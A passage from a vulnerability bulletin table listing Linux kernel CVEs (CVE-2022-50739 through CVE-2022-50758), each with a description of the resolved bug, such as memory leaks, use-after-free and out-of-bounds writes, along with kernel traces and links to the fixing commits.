114.496859] vfs_get_tree+0x4c/0x130 [ 114.497099] path_mount+0x654/0xfe0 [ 114.497507] ? putname+0x80/0xa0 [ 114.497933] ? finish_automount+0x2e0/0x2e0 [ 114.498362] ? putname+0x80/0xa0 [ 114.498571] ? kmem_cache_free+0x1c4/0x440 [ 114.498819] ? putname+0x80/0xa0 [ 114.499069] do_mount+0xd6/0xf0 [ 114.499343] ? path_mount+0xfe0/0xfe0 [ 114.499683] ? __kasan_check_write+0x14/0x20 [ 114.500133] __x64_sys_mount+0xca/0x110 [ 114.500592] do_syscall_64+0x3b/0x90 [ 114.500930] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 114.501294] RIP: 0033:0x7fdc898e948a [ 114.501542] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 114.502716] RSP: 002b:00007ffd793e58f8 EFLAGS: 00000202 ORIG_RAX: 00000000000000a5 [ 114.503175] RAX: ffffffffffffffda RBX: 0000564b2228f060 RCX: 00007fdc898e948a [ 114.503588] RDX: 0000564b2228f260 RSI: 0000564b2228f2e0 RDI: 0000564b22297ce0 [ 114.504925] RBP: 0000000000000000 R08: 0000564b2228f280 R09: 0000000000000020 [ 114.505484] R10: 00000000c0ed0000 R11: 0000000000000202 R12: 0000564b22297ce0 [ 114.505823] R13: 0000564b2228f260 R14: 0000000000000000 R15: 00000000ffffffff [ 114.506562] </TASK> [ 114.506887] Modules linked in: [ 114.507648] CR2: 0000000000000008 [ 114.508884] ---[ end trace 0000000000000000 ]--- [ 114.509675] RIP: 0010:d_flags_for_inode+0xe0/0x110 [ 114.510140] Code: 24 f7 ff 49 83 3e 00 74 41 41 83 cd 02 66 44 89 6b 02 eb 92 48 8d 7b 20 e8 6d 24 f7 ff 4c 8b 73 20 49 8d 7e 08 e8 60 241 [ 114.511762] RSP: 0018:ffff8880065e7aa8 EFLAGS: 00000296 [ 114.512401] RAX: 0000000000000001 RBX: ffff888008ccd750 RCX: ffffffff84af2aea [ 114.51 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2022-50739 | https://git.kernel.org/stable/c/f62506f5e45afbb01c84c3f28a2878b320a0b0f7 https://git.kernel.org/stable/c/9f24743ddcdd3683b0a6b16e1439ad091dc3489b https://git.kernel.org/stable/c/a7b23037b38b577d9a4372e0c6b7c9fe808070c1 https://git.kernel.org/stable/c/c1ca8ef0262b25493631ecbd9cb8c9893e1481a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: hif_usb: fix memory leak of urbs in ath9k_hif_usb_dealloc_tx_urbs() Syzkaller reports a long-known leak of urbs in ath9k_hif_usb_dealloc_tx_urbs(). The cause of the leak is that usb_get_urb() is called but usb_free_urb() (or usb_put_urb()) is not called inside usb_kill_urb() as urb->dev or urb->ep fields have not been initialized and usb_kill_urb() returns immediately. The patch removes trying to kill urbs located in hif_dev->tx.tx_buf because hif_dev->tx.tx_buf is not supposed to contain urbs which are in pending state (the pending urbs are stored in hif_dev->tx.tx_pending). The tx.tx_lock is acquired so there should not be any changes in the list. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-24 | not yet calculated | CVE-2022-50740 | https://git.kernel.org/stable/c/134ae5eba41294eff76e4be20d6001b8f0192207 https://git.kernel.org/stable/c/472312fef2b9eccaa03bd59e0ab2527da945e736 https://git.kernel.org/stable/c/eddbb8f7620f9f8008b090a6e10c460074ca575a https://git.kernel.org/stable/c/9850791d389b342ae6e573fe8198db0b4d338352 https://git.kernel.org/stable/c/c3fb3e9a2c0c1a0fa492d90eb19bcfa92a5f884d https://git.kernel.org/stable/c/d856f7574bcc1d81de565a857caf32f122cd7ce0 https://git.kernel.org/stable/c/c05189a429fdb371dd455c3c466d67ac2ebff152 https://git.kernel.org/stable/c/08aa0537ec8cf29ceccae98acc1a534fc12598c1 https://git.kernel.org/stable/c/c2a94de38c74e86f49124ac14f093d6a5c377a90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: imx-jpeg: Disable useless interrupt to avoid kernel panic There is a hardware bug that the interrupt STMBUF_HALF may be triggered after or when disable interrupt. It may led to unexpected kernel panic. And interrupt STMBUF_HALF and STMBUF_RTND have no other effect. So disable them and the unused interrupts. meanwhile clear the interrupt status when disable interrupt. | 2025-12-24 | not yet calculated | CVE-2022-50741 | https://git.kernel.org/stable/c/ad31bc146f0e4521805695f4f99d8a3c3b2761f6 https://git.kernel.org/stable/c/f1257fc8fc988bdc4b26277f58bbf7b694b531f0 https://git.kernel.org/stable/c/35591c2469953d59abdb16cb7beac834052cdb4f https://git.kernel.org/stable/c/c3720e65c9013a7b2a5dbb63e6bf6d74a35dd894 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: misc: ocxl: fix possible refcount leak in afu_ioctl() eventfd_ctx_put need to be called to put the refcount that gotten by eventfd_ctx_fdget when ocxl_irq_set_handler fails. | 2025-12-24 | not yet calculated | CVE-2022-50742 | https://git.kernel.org/stable/c/fc797285c40a9cc441357abb3521d3e51c743f67 https://git.kernel.org/stable/c/7ba19a60c74fb0057d4daef2fa2cbfc9522f3ba1 https://git.kernel.org/stable/c/11bd8bbdf8f6f5c1145bb158793107a57e3a1f07 https://git.kernel.org/stable/c/843433a02e344d30fbb62dfd834c60631baaa527 https://git.kernel.org/stable/c/66032c43291672bae8b93184d2806f05be3e16df https://git.kernel.org/stable/c/c3b69ba5114c860d730870c03ab4ee45276e5e35 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: Fix pcluster memleak when its block address is zero syzkaller reported a memleak: https://syzkaller.appspot.com/bug?id=62f37ff612f0021641eda5b17f056f1668aa9aed unreferenced object 0xffff88811009c7f8 (size 136): ... backtrace: [<ffffffff821db19b>] z_erofs_do_read_page+0x99b/0x1740 [<ffffffff821dee9e>] z_erofs_readahead+0x24e/0x580 [<ffffffff814bc0d6>] read_pages+0x86/0x3d0 ... syzkaller constructed a case: in z_erofs_register_pcluster(), ztailpacking = false and map->m_pa = zero. This makes pcl->obj.index be zero although pcl is not a inline pcluster. Then following path adds refcount for grp, but the refcount won't be put because pcl is inline. z_erofs_readahead() z_erofs_do_read_page() # for another page z_erofs_collector_begin() erofs_find_workgroup() erofs_workgroup_get() Since it's illegal for the block address of a non-inlined pcluster to be zero, add check here to avoid registering the pcluster which would be leaked. | 2025-12-24 | not yet calculated | CVE-2022-50743 | https://git.kernel.org/stable/c/ac54c1f7b288d83b6ba1e320efff24ecc21309cd https://git.kernel.org/stable/c/618e712b99c78d1004b70a1a9ab0a4830d0b2673 https://git.kernel.org/stable/c/c42c0ffe81176940bd5dead474216b7198d77675 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix hard lockup when reading the rx_monitor from debugfs During I/O and simultaneous cat of /sys/kernel/debug/lpfc/fnX/rx_monitor, a hard lockup similar to the call trace below may occur. The spin_lock_bh in lpfc_rx_monitor_report is not protecting from timer interrupts as expected, so change the strength of the spin lock to _irq. Kernel panic - not syncing: Hard LOCKUP CPU: 3 PID: 110402 Comm: cat Kdump: loaded exception RIP: native_queued_spin_lock_slowpath+91 [IRQ stack] native_queued_spin_lock_slowpath at ffffffffb814e30b _raw_spin_lock at ffffffffb89a667a lpfc_rx_monitor_record at ffffffffc0a73a36 [lpfc] lpfc_cmf_timer at ffffffffc0abbc67 [lpfc] __hrtimer_run_queues at ffffffffb8184250 hrtimer_interrupt at ffffffffb8184ab0 smp_apic_timer_interrupt at ffffffffb8a026ba apic_timer_interrupt at ffffffffb8a01c4f [End of IRQ stack] apic_timer_interrupt at ffffffffb8a01c4f lpfc_rx_monitor_report at ffffffffc0a73c80 [lpfc] lpfc_rx_monitor_read at ffffffffc0addde1 [lpfc] full_proxy_read at ffffffffb83e7fc3 vfs_read at ffffffffb833fe71 ksys_read at ffffffffb83402af do_syscall_64 at ffffffffb800430b entry_SYSCALL_64_after_hwframe at ffffffffb8a000ad | 2025-12-24 | not yet calculated | CVE-2022-50744 | https://git.kernel.org/stable/c/2cf66428a2545bb33beb9624124a2377468bb478 https://git.kernel.org/stable/c/cd542900ee5147028bbe603b238efcab8d720838 https://git.kernel.org/stable/c/39761417ea7b654217d6d9085afbf7c87ba3675d https://git.kernel.org/stable/c/c44e50f4a0ec00c2298f31f91bc2c3e9bbd81c7e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: media: tegra-video: fix device_node use after free At probe time this code path is followed: * tegra_csi_init * tegra_csi_channels_alloc * for_each_child_of_node(node, channel) -- iterates over channels * automatically gets 'channel' * tegra_csi_channel_alloc() * saves into chan->of_node a pointer to the channel OF node * automatically gets and puts 'channel' * now the node saved in chan->of_node has refcount 0, can disappear * tegra_csi_channels_init * iterates over channels * tegra_csi_channel_init -- uses chan->of_node After that, chan->of_node keeps storing the node until the device is removed. of_node_get() the node and of_node_put() it during teardown to avoid any risk. | 2025-12-24 | not yet calculated | CVE-2022-50745 | https://git.kernel.org/stable/c/5451efb2ca30f3c42b9efb8327ce35b62870dbd3 https://git.kernel.org/stable/c/ce50c612458091d926ccb05d7db11d9f93532db2 https://git.kernel.org/stable/c/6512c9498fcb97e7c760e3ef86b2272f2c0f765f https://git.kernel.org/stable/c/0fd003d3c708c80350a815eaf37b8e1114b976cf https://git.kernel.org/stable/c/c4d344163c3a7f90712525f931a6c016bbb35e18 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: validate the extent length for uncompressed pclusters syzkaller reported a KASAN use-after-free: https://syzkaller.appspot.com/bug?extid=2ae90e873e97f1faf6f2 The referenced fuzzed image actually has two issues: - m_pa == 0 as a non-inlined pcluster; - The logical length is longer than its physical length. The first issue has already been addressed. This patch addresses the second issue by checking the extent length validity. | 2025-12-24 | not yet calculated | CVE-2022-50746 | https://git.kernel.org/stable/c/dc8b6bd587b13b85aff6e9d36cdfcd3f955cac9e https://git.kernel.org/stable/c/40c73b2ea9611b5388807be406f30f5e4e1162da https://git.kernel.org/stable/c/c505feba4c0d76084e56ec498ce819f02a7043ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: Fix OOB Write in hfs_asc2mac Syzbot reported a OOB Write bug: loop0: detected capacity change from 0 to 64 ================================================================== BUG: KASAN: slab-out-of-bounds in hfs_asc2mac+0x467/0x9a0 fs/hfs/trans.c:133 Write of size 1 at addr ffff88801848314e by task syz-executor391/3632 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x1b1/0x28e lib/dump_stack.c:106 print_address_description+0x74/0x340 mm/kasan/report.c:284 print_report+0x107/0x1f0 mm/kasan/report.c:395 kasan_report+0xcd/0x100 mm/kasan/report.c:495 hfs_asc2mac+0x467/0x9a0 fs/hfs/trans.c:133 hfs_cat_build_key+0x92/0x170 fs/hfs/catalog.c:28 hfs_lookup+0x1ab/0x2c0 fs/hfs/dir.c:31 lookup_open fs/namei.c:3391 [inline] open_last_lookups fs/namei.c:3481 [inline] path_openat+0x10e6/0x2df0 fs/namei.c:3710 do_filp_open+0x264/0x4f0 fs/namei.c:3740 If in->len is much larger than HFS_NAMELEN(31) which is the maximum length of an HFS filename, a OOB write could occur in hfs_asc2mac(). In that case, when the dst reaches the boundary, the srclen is still greater than 0, which causes a OOB write. Fix this by adding a check on dstlen in while() before writing to dst address. | 2025-12-24 | not yet calculated | CVE-2022-50747 | https://git.kernel.org/stable/c/8399318b13dc9e0569dee07ba2994098926d4fb2 https://git.kernel.org/stable/c/95040de81c629cd8d3c6ab5b50a8bd5088068303 https://git.kernel.org/stable/c/ba8f0ca386dd15acf5a93cbac932392c7818eab4 https://git.kernel.org/stable/c/6a95b17e4d4cd2d8278559f930b447f8c9c8cff9 https://git.kernel.org/stable/c/cff9fefdfbf5744afbb6d70bff2b49ec2065d23d https://git.kernel.org/stable/c/7af9cb8cbb81308ce4b06cc7164267faccbf75dd https://git.kernel.org/stable/c/ae21b03f904736eb2aa9bd119d2a14e741f1681f https://git.kernel.org/stable/c/88579c158e026860c61c4192531e8bc42f4bc642 https://git.kernel.org/stable/c/c53ed55cb275344086e32a7080a6b19cb183650b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipc: mqueue: fix possible memory leak in init_mqueue_fs() commit db7cfc380900 ("ipc: Free mq_sysctls if ipc namespace creation failed") Here's a similar memory leak to the one fixed by the patch above. retire_mq_sysctls need to be called when init_mqueue_fs fails after setup_mq_sysctls. | 2025-12-24 | not yet calculated | CVE-2022-50748 | https://git.kernel.org/stable/c/a1f321051e0dcf2415fb94f81fdc5044cad4c1d6 https://git.kernel.org/stable/c/55b3709c6d68e32cd3fdd2a630b1f4c97d51b17c https://git.kernel.org/stable/c/c579d60f0d0cd87552f64fdebe68b5d941d20309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: acct: fix potential integer overflow in encode_comp_t() The integer overflow is descripted with following codes: > 317 static comp_t encode_comp_t(u64 value) > 318 { > 319 int exp, rnd; ...... > 341 exp <<= MANTSIZE; > 342 exp += value; > 343 return exp; > 344 } Currently comp_t is defined as type of '__u16', but the variable 'exp' is type of 'int', so overflow would happen when variable 'exp' in line 343 is greater than 65535. | 2025-12-24 | not yet calculated | CVE-2022-50749 | https://git.kernel.org/stable/c/e93f995a591c352d35d89c518c54f790e1537754 https://git.kernel.org/stable/c/cf60bbca1b83a7e0927e36dbf178328982927886 https://git.kernel.org/stable/c/1750a0983c455a9b3badd848471fc8d58cb61f67 https://git.kernel.org/stable/c/a815a3e019456c94b03bd183e7ac22fd29e9e6fd https://git.kernel.org/stable/c/6edd0cdee5780fd5f43356b72b29a2a6d48ef6da https://git.kernel.org/stable/c/ebe16676e1dcaa4556ec4d36ca40c82e99e88cfa https://git.kernel.org/stable/c/2224897d8187dc22a83e05d9361efcccf67bcf12 https://git.kernel.org/stable/c/0aac6e60c464a5f942f995428e67f8ae1c422250 https://git.kernel.org/stable/c/c5f31c655bcc01b6da53b836ac951c1556245305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panel/panel-sitronix-st7701: Remove panel on DSI attach failure In case mipi_dsi_attach() fails, call drm_panel_remove() to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2022-50750 | https://git.kernel.org/stable/c/0b7c47b7f358f932159a9d5beec9616ef8a0c6b4 https://git.kernel.org/stable/c/576828e59a0e03bbc763872912b04f3e3a1b3311 https://git.kernel.org/stable/c/13fc167e1645c43c631d7752d98e377f0e4cbb15 https://git.kernel.org/stable/c/23fddf78eac8d79c56f93ab69b6c47a0816967c9 https://git.kernel.org/stable/c/465611e812587e72bf235034edce0e51be3d6809 https://git.kernel.org/stable/c/c62102165dd79284d42383d2f7ed17301bd8e629 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: configfs: fix possible memory leak in configfs_create_dir() kmemleak reported memory leaks in configfs_create_dir(): unreferenced object 0xffff888009f6af00 (size 192): comm "modprobe", pid 3777, jiffies 4295537735 (age 233.784s) backtrace: kmem_cache_alloc (mm/slub.c:3250 mm/slub.c:3256 mm/slub.c:3263 mm/slub.c:3273) new_fragment (./include/linux/slab.h:600 fs/configfs/dir.c:163) configfs_register_subsystem (fs/configfs/dir.c:1857) basic_write (drivers/hwtracing/stm/p_basic.c:14) stm_p_basic do_one_initcall (init/main.c:1296) do_init_module (kernel/module/main.c:2455) ... unreferenced object 0xffff888003ba7180 (size 96): comm "modprobe", pid 3777, jiffies 4295537735 (age 233.784s) backtrace: kmem_cache_alloc (mm/slub.c:3250 mm/slub.c:3256 mm/slub.c:3263 mm/slub.c:3273) configfs_new_dirent (./include/linux/slab.h:723 fs/configfs/dir.c:194) configfs_make_dirent (fs/configfs/dir.c:248) configfs_create_dir (fs/configfs/dir.c:296) configfs_attach_group.isra.28 (fs/configfs/dir.c:816 fs/configfs/dir.c:852) configfs_register_subsystem (fs/configfs/dir.c:1881) basic_write (drivers/hwtracing/stm/p_basic.c:14) stm_p_basic do_one_initcall (init/main.c:1296) do_init_module (kernel/module/main.c:2455) ... This is because the refcount is not correct in configfs_make_dirent(). For normal stage, the refcount is changing as: configfs_register_subsystem() configfs_create_dir() configfs_make_dirent() configfs_new_dirent() # set s_count = 1 dentry->d_fsdata = configfs_get(sd); # s_count = 2 ... configfs_unregister_subsystem() configfs_remove_dir() remove_dir() configfs_remove_dirent() # s_count = 1 dput() ... *dentry_unlink_inode()* configfs_d_iput() # s_count = 0, release However, if we failed in configfs_create(): configfs_register_subsystem() configfs_create_dir() configfs_make_dirent() # s_count = 2 ... configfs_create() # fail ->out_remove: configfs_remove_dirent(dentry) configfs_put(sd) # s_count = 1 return PTR_ERR(inode); There is no inode in the error path, so the configfs_d_iput() is lost and makes sd and fragment memory leaked. To fix this, when we failed in configfs_create(), manually call configfs_put(sd) to keep the refcount correct. | 2025-12-24 | not yet calculated | CVE-2022-50751 | https://git.kernel.org/stable/c/90c38f57a821499391526b15cc944c265bd24e48 https://git.kernel.org/stable/c/74ac7c9ee2d486c501e7864c903f5098fc477acd https://git.kernel.org/stable/c/07f82dca112262b169bec0001378126439cab776 https://git.kernel.org/stable/c/8bc77754224a2c8581727ffe2e958119b4e27c8f https://git.kernel.org/stable/c/c72eb6e6e49a71f7598740786568fafdd013a227 https://git.kernel.org/stable/c/c65234b283a65cfbfc94619655e820a5e55199eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: Remove unnecessary bio_put() in raid5_read_one_chunk() When running chunk-sized reads on disks with badblocks duplicate bio free/puts are observed: ============================================================================= BUG bio-200 (Not tainted): Object already free ----------------------------------------------------------------------------- Allocated in mempool_alloc_slab+0x17/0x20 age=3 cpu=2 pid=7504 __slab_alloc.constprop.0+0x5a/0xb0 kmem_cache_alloc+0x31e/0x330 mempool_alloc_slab+0x17/0x20 mempool_alloc+0x100/0x2b0 bio_alloc_bioset+0x181/0x460 do_mpage_readpage+0x776/0xd00 mpage_readahead+0x166/0x320 blkdev_readahead+0x15/0x20 read_pages+0x13f/0x5f0 page_cache_ra_unbounded+0x18d/0x220 force_page_cache_ra+0x181/0x1c0 page_cache_sync_ra+0x65/0xb0 filemap_get_pages+0x1df/0xaf0 filemap_read+0x1e1/0x700 blkdev_read_iter+0x1e5/0x330 vfs_read+0x42a/0x570 Freed in mempool_free_slab+0x17/0x20 age=3 cpu=2 pid=7504 kmem_cache_free+0x46d/0x490 mempool_free_slab+0x17/0x20 mempool_free+0x66/0x190 bio_free+0x78/0x90 bio_put+0x100/0x1a0 raid5_make_request+0x2259/0x2450 md_handle_request+0x402/0x600 md_submit_bio+0xd9/0x120 __submit_bio+0x11f/0x1b0 submit_bio_noacct_nocheck+0x204/0x480 submit_bio_noacct+0x32e/0xc70 submit_bio+0x98/0x1a0 mpage_readahead+0x250/0x320 blkdev_readahead+0x15/0x20 read_pages+0x13f/0x5f0 page_cache_ra_unbounded+0x18d/0x220 Slab 0xffffea000481b600 objects=21 used=0 fp=0xffff8881206d8940 flags=0x17ffffc0010201(locked|slab|head|node=0|zone=2|lastcpupid=0x1fffff) CPU: 0 PID: 34525 Comm: kworker/u24:2 Not tainted 6.0.0-rc2-localyes-265166-gf11c5343fa3f #143 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Workqueue: raid5wq raid5_do_work Call Trace: <TASK> dump_stack_lvl+0x5a/0x78 dump_stack+0x10/0x16 print_trailer+0x158/0x165 object_err+0x35/0x50 free_debug_processing.cold+0xb7/0xbe __slab_free+0x1ae/0x330 kmem_cache_free+0x46d/0x490 mempool_free_slab+0x17/0x20 mempool_free+0x66/0x190 bio_free+0x78/0x90 bio_put+0x100/0x1a0 mpage_end_io+0x36/0x150 bio_endio+0x2fd/0x360 md_end_io_acct+0x7e/0x90 bio_endio+0x2fd/0x360 handle_failed_stripe+0x960/0xb80 handle_stripe+0x1348/0x3760 handle_active_stripes.constprop.0+0x72a/0xaf0 raid5_do_work+0x177/0x330 process_one_work+0x616/0xb20 worker_thread+0x2bd/0x6f0 kthread+0x179/0x1b0 ret_from_fork+0x22/0x30 </TASK> The double free is caused by an unnecessary bio_put() in the if(is_badblock(...)) error path in raid5_read_one_chunk(). The error path was moved ahead of bio_alloc_clone() in c82aa1b76787c ("md/raid5: move checking badblock before clone bio in raid5_read_one_chunk"). The previous code checked and freed align_bio which required a bio_put. After the move that is no longer needed as raid_bio is returned to the control of the common io path which performs its own endio resulting in a double free on bad device blocks. | 2025-12-24 | not yet calculated | CVE-2022-50752 | https://git.kernel.org/stable/c/7a37c58ee72e1fadd22c4ee990cb74c2ca2280e7 https://git.kernel.org/stable/c/c0fd5d4d8fd7b1a50306d7a23c720cf808f41fdf https://git.kernel.org/stable/c/21a9c7354aa59e97e26ece5f0a609c8bfa43020d https://git.kernel.org/stable/c/c66a6f41e09ad386fd2cce22b9cded837bbbc704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on summary info As Wenqing Liu reported in bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=216456 BUG: KASAN: use-after-free in recover_data+0x63ae/0x6ae0 [f2fs] Read of size 4 at addr ffff8881464dcd80 by task mount/1013 CPU: 3 PID: 1013 Comm: mount Tainted: G W 6.0.0-rc4 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Call Trace: dump_stack_lvl+0x45/0x5e print_report.cold+0xf3/0x68d kasan_report+0xa8/0x130 recover_data+0x63ae/0x6ae0 [f2fs] f2fs_recover_fsync_data+0x120d/0x1fc0 [f2fs] f2fs_fill_super+0x4665/0x61e0 [f2fs] mount_bdev+0x2cf/0x3b0 legacy_get_tree+0xed/0x1d0 vfs_get_tree+0x81/0x2b0 path_mount+0x47e/0x19d0 do_mount+0xce/0xf0 __x64_sys_mount+0x12c/0x1a0 do_syscall_64+0x38/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd The root cause is: in fuzzed image, SSA table is corrupted: ofs_in_node is larger than ADDRS_PER_PAGE(), result in out-of-range access on 4k-size page. - recover_data - do_recover_data - check_index_in_prev_nodes - f2fs_data_blkaddr This patch adds sanity check on summary info in recovery and GC flow in where the flows rely on them. After patch: [ 29.310883] F2FS-fs (loop0): Inconsistent ofs_in_node:65286 in summary, ino:0, nid:6, max:1018 | 2025-12-24 | not yet calculated | CVE-2022-50753 | https://git.kernel.org/stable/c/c99860f9a75079f339ed7670425b1ac58f26e2ff https://git.kernel.org/stable/c/4a8e8bf280703e04e0b9d91f101e1fdd9a5bd09e https://git.kernel.org/stable/c/73687c53919f49dff3852155621dab7a35c52854 https://git.kernel.org/stable/c/e168f819bfa42459b14f479e55ebd550bcc78899 https://git.kernel.org/stable/c/0922ad64ccefa3e483e84355942b86e13c8fea68 https://git.kernel.org/stable/c/c6ad7fd16657ebd34a87a97d9588195aae87597d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix a memleak in multi_transaction_new() In multi_transaction_new(), the variable t is not freed or passed out on the failure of copy_from_user(t->data, buf, size), which could lead to a memleak. Fix this bug by adding a put_multi_transaction(t) in the error path. | 2025-12-24 | not yet calculated | CVE-2022-50754 | https://git.kernel.org/stable/c/11d5fe7da67c3334cefc981297fd5defb78df15c https://git.kernel.org/stable/c/95e6adc6a7a4761ddf69ad713e55a06a3206309d https://git.kernel.org/stable/c/eb0f78e28cbc8f97439c0a4c80ee5160c1df5ce6 https://git.kernel.org/stable/c/935d86b29093e75b6c547d90b3979c2c2d23f1c4 https://git.kernel.org/stable/c/775a37ffa9f4681c4ad84c8634a7eec8af7098d4 https://git.kernel.org/stable/c/88989932c2269ea66074f52a6213598838f8b9e7 https://git.kernel.org/stable/c/3d27a436e294ac5d7a51bd5348ca63a42a468b35 https://git.kernel.org/stable/c/c73275cf6834787ca090317f1d20dbfa3b7f05aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udf: Avoid double brelse() in udf_rename() syzbot reported a warning like below [1]: VFS: brelse: Trying to free free buffer WARNING: CPU: 2 PID: 7301 at fs/buffer.c:1145 __brelse+0x67/0xa0 ... Call Trace: <TASK> invalidate_bh_lru+0x99/0x150 smp_call_function_many_cond+0xe2a/0x10c0 ? generic_remap_file_range_prep+0x50/0x50 ? __brelse+0xa0/0xa0 ? __mutex_lock+0x21c/0x12d0 ? smp_call_on_cpu+0x250/0x250 ? rcu_read_lock_sched_held+0xb/0x60 ? lock_release+0x587/0x810 ? __brelse+0xa0/0xa0 ? generic_remap_file_range_prep+0x50/0x50 on_each_cpu_cond_mask+0x3c/0x80 blkdev_flush_mapping+0x13a/0x2f0 blkdev_put_whole+0xd3/0xf0 blkdev_put+0x222/0x760 deactivate_locked_super+0x96/0x160 deactivate_super+0xda/0x100 cleanup_mnt+0x222/0x3d0 task_work_run+0x149/0x240 ? task_work_cancel+0x30/0x30 do_exit+0xb29/0x2a40 ? reacquire_held_locks+0x4a0/0x4a0 ? do_raw_spin_lock+0x12a/0x2b0 ? mm_update_next_owner+0x7c0/0x7c0 ? rwlock_bug.part.0+0x90/0x90 ? zap_other_threads+0x234/0x2d0 do_group_exit+0xd0/0x2a0 __x64_sys_exit_group+0x3a/0x50 do_syscall_64+0x34/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd The cause of the issue is that brelse() is called on both ofibh.sbh and ofibh.ebh by udf_find_entry() when it returns NULL. However, brelse() is called by udf_rename(), too. So, b_count on buffer_head becomes unbalanced. This patch fixes the issue by not calling brelse() by udf_rename() when udf_find_entry() returns NULL. | 2025-12-24 | not yet calculated | CVE-2022-50755 | https://git.kernel.org/stable/c/78eba2778ae10fb2a9d450e14d26eb6f6bf1f906 https://git.kernel.org/stable/c/9d2cad69547abea961fa80426d600b861de1952b https://git.kernel.org/stable/c/d6da7ec0f94f5208c848e0e94b70f54a0bd9c587 https://git.kernel.org/stable/c/156d440dea97deada629bb51cb17887abd862605 https://git.kernel.org/stable/c/40dba68d418237b1ae2beaa06d46a94dd946278e https://git.kernel.org/stable/c/e7a6a53c871460727be09f4414ccb29fb8697526 https://git.kernel.org/stable/c/4fca09045509f5bde8fc28e68fbca38cb4bdcf2e https://git.kernel.org/stable/c/090bf49833c51da297ec74f98ad2bf44daea9311 https://git.kernel.org/stable/c/c791730f2554a9ebb8f18df9368dc27d4ebc38c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: fix mempool alloc size Convert the max size to bytes to match the units of the divisor that calculates the worst-case number of PRP entries. The result is used to determine how many PRP Lists are required. The code was previously rounding this to 1 list, but we can require 2 in the worst case. In that scenario, the driver would corrupt memory beyond the size provided by the mempool. While unlikely to occur (you'd need a 4MB in exactly 127 phys segments on a queue that doesn't support SGLs), this memory corruption has been observed by kfence. | 2025-12-24 | not yet calculated | CVE-2022-50756 | https://git.kernel.org/stable/c/dfb6d54893d544151e7f480bc44cfe7823f5ad23 https://git.kernel.org/stable/c/9141144b37f30e3e7fa024bcfa0a13011e546ba9 https://git.kernel.org/stable/c/e1777b4286e526c58b4ee699344b0ad85aaf83a0 https://git.kernel.org/stable/c/b1814724e0d7162bdf4799f2d565381bc2251c63 https://git.kernel.org/stable/c/c89a529e823d51dd23c7ec0c047c7a454a428541 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: camss: Clean up received buffers on failed start of streaming It is required to return the received buffers, if streaming can not be started. For instance media_pipeline_start() may fail with EPIPE, if a link validation between entities is not passed, and in such a case a user gets a kernel warning: WARNING: CPU: 1 PID: 520 at drivers/media/common/videobuf2/videobuf2-core.c:1592 vb2_start_streaming+0xec/0x160 <snip> Call trace: vb2_start_streaming+0xec/0x160 vb2_core_streamon+0x9c/0x1a0 vb2_ioctl_streamon+0x68/0xbc v4l_streamon+0x30/0x3c __video_do_ioctl+0x184/0x3e0 video_usercopy+0x37c/0x7b0 video_ioctl2+0x24/0x40 v4l2_ioctl+0x4c/0x70 The fix is to correct the error path in video_start_streaming() of camss. | 2025-12-24 | not yet calculated | CVE-2022-50757 | https://git.kernel.org/stable/c/75954cde8a5ca84003b24b6bf83197240935bd74 https://git.kernel.org/stable/c/04c734c716a97f1493b1edac41316aaed1d2a9d9 https://git.kernel.org/stable/c/fe443b3fe36cd23d4f5dc6d825d34322e7c89f0c https://git.kernel.org/stable/c/3d5cab726e3b370fea1b6e67183f0e13c409ce5c https://git.kernel.org/stable/c/d1c44928bb3ca0ec88e7ad5937a2a26a259aede6 https://git.kernel.org/stable/c/f05326a440dc31b91b688b2f3f15b7347894a50b https://git.kernel.org/stable/c/24df4fa3e795fb4b15fd4d3c036596e0978d265a https://git.kernel.org/stable/c/c8f3582345e6a69da65ab588f7c4c2d1685b0e80 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: vt6655: fix potential memory leak In function device_init_td0_ring, memory is allocated for member td_info of priv->apTD0Rings[i], with i increasing from 0. In case of allocation failure, the memory is freed in reversed order, with i decreasing to 0. However, the case i=0 is left out and thus memory is leaked. Modify the memory freeing loop to include the case i=0. | 2025-12-24 | not yet calculated | CVE-2022-50758 | https://git.kernel.org/stable/c/e741e38aa98704fbb959650ecd270b71b2670680 https://git.kernel.org/stable/c/16a45e78a687eb6c69acc4e62b94b6508b0bfbda https://git.kernel.org/stable/c/1b3cebeca99e8e0aa4fa57faac8dbf41e967317a https://git.kernel.org/stable/c/ff8551d411f12b5abc5ca929ab87643afa8a9588 https://git.kernel.org/stable/c/fb5f569bcda8f87bd47d8030bfae343d757fa3ea 